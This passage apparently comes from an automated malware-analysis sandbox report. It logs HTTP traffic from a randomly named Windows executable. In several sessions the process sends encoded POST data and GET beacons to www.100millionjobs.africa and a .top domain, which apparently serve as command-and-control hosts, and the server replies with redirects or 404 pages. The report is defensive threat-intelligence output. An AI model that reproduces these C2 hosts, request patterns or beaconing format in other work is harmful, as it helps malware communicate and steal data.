                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                              Jan 14, 2025 12:02:27.851459980 CET224INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20
                                                                              Data Ascii: /bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendo
                                                                              Jan 14, 2025 12:02:27.851474047 CET1236INData Raw: 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f
                                                                              Data Ascii: r/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="assets/vendor/timeline/timeline.css"> ...
                                                                              Jan 14, 2025 12:02:27.851488113 CET1236INData Raw: 2d 62 6f 75 6e 63 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68
                                                                              Data Ascii: -bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color fables-top-header-signin"> <div class="con
                                                                              Jan 14, 2025 12:02:27.851502895 CET1236INData Raw: 72 2d 31 22 3e 20 46 72 65 6e 63 68 3c 2f 61 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: r-1"> French</a> </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables-third-text-color font-13"><span class="fables-
                                                                              Jan 14, 2025 12:02:27.851517916 CET1236INData Raw: 72 67 65 74 3d 22 23 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20
                                                                              Data Ascii: rget="#fablesNavDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-16"></span> </butto
                                                                              Jan 14, 2025 12:02:27.851526976 CET1236INData Raw: 22 68 6f 6d 65 34 2e 68 74 6d 6c 22 3e 48 6f 6d 65 20 34 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20
                                                                              Data Ascii: "home4.html">Home 4</a></li> </ul> </li> <li class="nav-item dropdown"> <a class="nav-link
                                                                              Jan 14, 2025 12:02:27.851541996 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22
                                                                              Data Ascii: <li><a class="dropdown-item" href="header1-dark.html">Header 1 Dark</a></li><li><a class="dropdown-item" href="header-megamenu.html">Header Mega menu</a></li>
                                                                              Jan 14, 2025 12:02:27.851556063 CET776INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header3-transparent.html">Header 3 Transparent</a></li>
                                                                              Jan 14, 2025 12:02:27.851569891 CET1236INData Raw: 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63
                                                                              Data Ascii: opdown-menu"> <li><a class="dropdown-item" href="header4-transparent.html">Header 4 Transparent</a></li> <li><a class="drop
                                                                              Jan 14, 2025 12:02:27.856693029 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20
                                                                              Data Ascii: </ul> </li> </ul> </li> <li><a class="dropdo


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.549479136.243.64.147802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:33.226027966 CET683OUTPOST /ktot/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.100millionjobs.africa
                                                                              Origin: http://www.100millionjobs.africa
                                                                              Referer: http://www.100millionjobs.africa/ktot/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 64 76 34 38 31 52 6a 79 58 58 47 31 64 58 47 69 36 6d 6c 55 43 30 68 73 62 50 34 45 77 73 54 36 69 78 61 4c 74 6d 76 5a 4f 56 61 73 73 30 73 31 38 41 37 31 42 69 63 51 33 51 62 7a 39 33 4c 71 6e 59 63 33 30 79 4f 37 33 47 39 30 79 34 4f 70 2b 54 34 56 75 4c 36 4f 36 4a 4a 6c 6a 64 58 4d 69 50 39 6c 7a 51 61 78 5a 58 4c 72 57 79 53 6f 35 4c 43 55 75 49 77 36 45 77 53 68 37 41 6d 49 70 65 38 4d 6e 66 50 52 2f 42 68 58 53 56 55 45 6c 46 45 37 43 4e 6d 4c 30 53 5a 71 48 49 77 66 74 69 4f 54 6e 4a 6a 79 38 33 51 51 45 71 38 6b 55 65 2b 71 31 61 42 30 65 6f 77 42 30 41 78 35 49 2f 6e 78 65 42 49 3d
                                                                              Data Ascii: t0A=dv481RjyXXG1dXGi6mlUC0hsbP4EwsT6ixaLtmvZOVass0s18A71BicQ3Qbz93LqnYc30yO73G90y4Op+T4VuL6O6JJljdXMiP9lzQaxZXLrWySo5LCUuIw6EwSh7AmIpe8MnfPR/BhXSVUElFE7CNmL0SZqHIwftiOTnJjy83QQEq8kUe+q1aB0eowB0Ax5I/nxeBI=
                                                                              Jan 14, 2025 12:02:33.863503933 CET493INHTTP/1.1 302 Found
                                                                              Date: Tue, 14 Jan 2025 11:02:33 GMT
                                                                              Server: Apache
                                                                              Location: http://maximumgroup.co.za/ktot/
                                                                              Content-Length: 290
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6b 74 6f 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.549480136.243.64.147802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:35.774318933 CET703OUTPOST /ktot/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.100millionjobs.africa
                                                                              Origin: http://www.100millionjobs.africa
                                                                              Referer: http://www.100millionjobs.africa/ktot/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 64 76 34 38 31 52 6a 79 58 58 47 31 66 32 57 69 35 46 64 55 41 55 68 74 43 2f 34 45 36 4d 53 7a 69 78 65 4c 74 6b 43 43 4f 48 75 73 73 57 30 31 39 42 37 31 47 69 63 51 34 77 62 32 77 58 4c 6a 6e 59 51 46 30 33 75 37 33 48 5a 30 79 34 2b 70 35 67 41 53 76 62 36 41 33 70 4a 6e 6e 64 58 4d 69 50 39 6c 7a 51 2b 62 5a 58 7a 72 57 69 43 6f 2f 65 2b 4c 74 49 77 35 4d 51 53 68 70 77 6d 55 70 65 38 4c 6e 65 54 72 2f 43 5a 58 53 56 45 45 6b 55 45 34 62 64 6e 41 35 79 59 6a 49 4b 6c 72 31 68 4b 6c 6f 61 6d 48 6c 68 42 74 42 63 4e 4f 4f 38 32 43 6d 36 74 4d 4f 37 34 32 6c 77 51 51 53 63 33 42 41 57 63 68 69 79 66 34 70 6c 6a 67 66 6d 75 71 4a 69 41 78 47 55 75 4b
                                                                              Data Ascii: t0A=dv481RjyXXG1f2Wi5FdUAUhtC/4E6MSzixeLtkCCOHussW019B71GicQ4wb2wXLjnYQF03u73HZ0y4+p5gASvb6A3pJnndXMiP9lzQ+bZXzrWiCo/e+LtIw5MQShpwmUpe8LneTr/CZXSVEEkUE4bdnA5yYjIKlr1hKloamHlhBtBcNOO82Cm6tMO742lwQQSc3BAWchiyf4pljgfmuqJiAxGUuK
                                                                              Jan 14, 2025 12:02:36.394908905 CET493INHTTP/1.1 302 Found
                                                                              Date: Tue, 14 Jan 2025 11:02:36 GMT
                                                                              Server: Apache
                                                                              Location: http://maximumgroup.co.za/ktot/
                                                                              Content-Length: 290
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6b 74 6f 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.549481136.243.64.147802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:38.321916103 CET1720OUTPOST /ktot/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.100millionjobs.africa
                                                                              Origin: http://www.100millionjobs.africa
                                                                              Referer: http://www.100millionjobs.africa/ktot/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 64 76 34 38 31 52 6a 79 58 58 47 31 66 32 57 69 35 46 64 55 41 55 68 74 43 2f 34 45 36 4d 53 7a 69 78 65 4c 74 6b 43 43 4f 48 57 73 73 46 38 31 38 69 54 31 48 69 63 51 31 51 62 4e 77 58 4b 6a 6e 59 49 42 30 33 7a 4d 33 46 52 30 67 4c 32 70 34 52 41 53 36 4c 36 41 72 5a 4a 6d 6a 64 57 45 69 50 4e 68 7a 51 75 62 5a 58 7a 72 57 6e 47 6f 70 37 43 4c 68 6f 77 36 45 77 53 45 37 41 6d 6f 70 64 4d 39 6e 65 47 57 2b 79 35 58 53 31 30 45 6f 43 51 34 45 4e 6e 43 33 53 59 37 49 4b 35 30 31 69 2b 54 6f 5a 36 70 6c 6d 74 74 44 4a 63 4f 62 59 79 41 31 34 68 56 4b 70 34 51 34 46 59 4c 54 4d 2f 42 43 6c 77 30 6e 32 7a 36 70 42 66 76 64 45 6e 5a 4c 57 63 33 4c 68 2b 45 33 4b 46 48 76 51 34 76 6a 70 46 64 39 4e 31 2f 66 4d 4d 31 67 42 48 2b 6a 79 6b 68 77 39 45 76 65 51 62 46 45 6c 5a 74 7a 50 46 70 68 2b 70 79 51 70 68 34 45 2b 33 65 53 57 33 65 4a 63 42 61 4e 51 36 52 33 4f 55 2b 61 4a 4f 69 34 62 78 6e 50 7a 51 51 72 2f 77 64 61 53 71 31 67 30 4b 79 71 68 6f 6d 4f 4f 5a 56 50 42 41 5a 76 49 6a 41 57 68 [TRUNCATED]
                                                                              Data Ascii: t0A=dv481RjyXXG1f2Wi5FdUAUhtC/4E6MSzixeLtkCCOHWssF818iT1HicQ1QbNwXKjnYIB03zM3FR0gL2p4RAS6L6ArZJmjdWEiPNhzQubZXzrWnGop7CLhow6EwSE7AmopdM9neGW+y5XS10EoCQ4ENnC3SY7IK501i+ToZ6plmttDJcObYyA14hVKp4Q4FYLTM/BClw0n2z6pBfvdEnZLWc3Lh+E3KFHvQ4vjpFd9N1/fMM1gBH+jykhw9EveQbFElZtzPFph+pyQph4E+3eSW3eJcBaNQ6R3OU+aJOi4bxnPzQQr/wdaSq1g0KyqhomOOZVPBAZvIjAWho2T8V1PDgu88hJRPXwYHRM51cmLY63F08ebbZb5VdCOMrGL3HOyC8bXszspubA4wxMwqDtHPWUegTNj2mIiUzPN879771lKrUbdTzwAH2W1rkv+dwSuv338OpWXD3VJIHHBnErkSQAk386YKkUnYI7VCd4Bcif699lRkfgTfVLbLGeDsiwkB6hwpP0ErLAuFfaZhG6RPcvU5PXgyC43xeEUnROOI7d01CdTC/0QYqu4Zmo5SyUggxzPntfXP7129IJ+5hHrTJK57jwomPQKo3Uz9G4n5CD5RThNxs/3XLtFwwzQVxrvrXMAshtGDmPPaUZ9Df10Br5v2ILaLJPijx7bE1WuA4PY59Lh8Lb2ubdpeMhfmHNC+jvd/NRByxlNoFfaHEPqAwbCF+8UswsY0jAZqP0m9XEU8+b7dkeKRKiVW9G3zfhQdHDUXZ9ttfAaD18ebFiGa2GDyQ0lo+RFvdO8VdN6uYeKHGQJaH0QFx0Qedwop6Jju0Rg0KlkyVzQjNEcu0rUY4FvPcbHJRlDExqMmNueB+rsR09Y03gBUd8zL0xAIWoepfkZ6o5TE1aEoMWiVHOS8SYQLCR5nHAtshgwAv2ngKdBLNent+y8OQ6iEHZQ3unv7ux+zwh1g37fh/hcGCKEYgs0Plr0yQuuVwlh3bdnTKsDiJo [TRUNCATED]
                                                                              Jan 14, 2025 12:02:38.957910061 CET493INHTTP/1.1 302 Found
                                                                              Date: Tue, 14 Jan 2025 11:02:38 GMT
                                                                              Server: Apache
                                                                              Location: http://maximumgroup.co.za/ktot/
                                                                              Content-Length: 290
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6b 74 6f 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.549482136.243.64.147802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:40.859766006 CET403OUTGET /ktot/?Gxq=1VbhX6&t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4cm5qqwpB+o9+wjMZc6zOEOHj6XVSyoPWAhOlCHSGIpA7arg== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.100millionjobs.africa
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:02:41.509357929 CET793INHTTP/1.1 302 Found
                                                                              Date: Tue, 14 Jan 2025 11:02:41 GMT
                                                                              Server: Apache
                                                                              Location: http://maximumgroup.co.za/ktot/?Gxq=1VbhX6&t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4cm5qqwpB+o9+wjMZc6zOEOHj6XVSyoPWAhOlCHSGIpA7arg==
                                                                              Content-Length: 442
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6b 74 6f 74 2f 3f 47 78 71 3d 31 56 62 68 58 36 26 61 6d 70 3b 74 30 41 3d 51 74 51 63 32 6d 71 4e 4a 77 76 4d 47 42 53 6f 6e 46 31 39 4f 6a 39 33 4f 63 63 44 69 62 71 32 70 6c 57 48 76 45 6e 79 56 44 66 70 35 47 67 39 2b 58 62 6c 44 58 38 79 31 57 4c 37 39 6c 4b 78 68 70 35 6b 73 6e 33 6d 69 6b 35 42 67 63 4f 6e 7a 77 34 63 6d 35 71 71 77 70 42 2b 6f 39 2b 77 6a 4d 5a 63 36 7a 4f 45 4f 48 6a 36 58 56 53 79 6f 50 57 41 68 4f 6c 43 48 53 47 49 70 41 37 61 72 67 3d 3d 22 3e [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/?Gxq=1VbhX6&amp;t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4cm5qqwpB+o9+wjMZc6zOEOHj6XVSyoPWAhOlCHSGIpA7arg==">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.549483134.122.133.80802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:47.101634026 CET680OUTPOST /3541/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.x3kwqc5tye4vl90y.top
                                                                              Origin: http://www.x3kwqc5tye4vl90y.top
                                                                              Referer: http://www.x3kwqc5tye4vl90y.top/3541/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 73 57 6f 7a 2f 5a 42 52 36 63 6b 2f 6d 71 39 74 51 46 6f 33 57 63 62 6b 73 2f 73 72 69 7a 51 4a 46 64 39 6f 67 6b 6f 6a 67 65 6e 43 4c 73 57 53 73 6c 58 77 4e 2b 71 4a 66 66 67 42 59 47 54 5a 6d 49 76 51 47 4b 4a 68 38 30 5a 69 6c 45 6f 61 34 6b 6b 70 34 6b 65 6f 45 33 50 2f 37 6c 57 48 6a 55 54 45 72 4a 76 6b 74 64 78 6f 6b 61 43 6e 2b 39 47 33 47 34 76 65 51 51 30 6f 45 62 37 35 39 47 39 59 72 46 6b 6c 70 59 36 32 57 4e 4e 74 6c 30 46 73 39 39 4a 74 4d 71 66 36 35 32 6e 73 75 68 46 53 37 48 48 52 38 71 74 30 70 39 44 74 37 6d 30 38 77 5a 37 51 4a 71 39 30 6f 32 33 6b 39 77 47 50 6e 5a 73 3d
                                                                              Data Ascii: t0A=sWoz/ZBR6ck/mq9tQFo3Wcbks/srizQJFd9ogkojgenCLsWSslXwN+qJffgBYGTZmIvQGKJh80ZilEoa4kkp4keoE3P/7lWHjUTErJvktdxokaCn+9G3G4veQQ0oEb759G9YrFklpY62WNNtl0Fs99JtMqf652nsuhFS7HHR8qt0p9Dt7m08wZ7QJq90o23k9wGPnZs=
                                                                              Jan 14, 2025 12:02:47.992187023 CET289INHTTP/1.1 404 Not Found
                                                                              Content-Length: 146
                                                                              Content-Type: text/html
                                                                              Date: Tue, 14 Jan 2025 11:02:47 GMT
                                                                              Server: nginx
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
